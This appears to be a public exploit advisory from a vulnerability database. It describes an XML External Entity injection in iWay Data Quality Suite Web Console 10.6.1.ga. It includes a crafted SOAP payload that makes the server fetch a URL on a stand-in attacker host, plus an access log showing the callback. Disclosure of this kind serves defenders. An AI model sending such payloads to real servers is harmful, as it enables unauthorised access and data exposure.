iWay Data Quality Suite Web Console 10.6.1.ga XML Injection

2018.09.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: iWay Data Quality Suite Web Console 10.6.1.ga-2016-11-20 a XML External Entity Injection # Google Dork: N/A # Date: 2018-09-27 # Exploit Author: Sureshbabu Narvaneni# # Author Blog : https://nullnews.in # Vendor Homepage: www.informationbuilders.co.uk # Software Link: http://www.informationbuilders.co.uk/products/integrity/dqsuite # Affected Version: 10.6.1.ga # Category: WebApps # Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686 # CVE : N/A # Technical Description: # iWay Data Quality Suite Web Console provides web services features. As there is no # validation present on the web services featured by product while processing # the user input an attacker can easily inject external entities in the SOAP request and can # achieve the successful Remote Code Execution on the server # Proof Of Concept: > Access the iWay DQS Web Console application section. > Create an entry for web service and form a sample SOAP request. > Send below crafted request to the server to confirm the vulnerability <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://attacker.com/xxetest">]> <soapenv:Envelope xml:soapenv="http://schemas.xmlsoap.org/soap/envelope" xmlns:ws="http://www.example.com/ws"> <soapenv:Header/> <soapenv:Body> <ws:test> <ws:in>&xxe;</ws:in> </ws:test> </soapenv:Body> </soapenv:Envelope> > The below log shows that the web service component is vulnerable to XXE. root@MrR3boot:/var/www/html# tail -f /var/log/apache2/access.log 1xx.xx.xxx.xx - - [25/Sep/2018:01:13:42 -0400] "GET /xxetest HTTP/1.0" 404 474 "-" "-"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top